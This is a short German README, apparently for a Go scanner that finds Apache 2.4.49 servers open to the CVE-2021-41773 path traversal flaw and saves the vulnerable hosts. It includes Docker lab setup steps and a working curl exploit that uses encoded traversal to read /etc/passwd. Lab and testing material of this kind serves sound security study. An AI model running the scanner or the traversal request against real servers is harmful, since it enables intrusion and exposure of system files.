
Ein automatischer Scanner für Apache 2.4.49
• ausführen: go run main.go ODER go build main.go && ./main • du kannst dein Payload anpassen • verwundbare Hosts werden gespeichert

Erstelle dein Labor: 1. Image herunterladen: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid 2. Image ausführen: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid 3. Exploit: curl -v "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"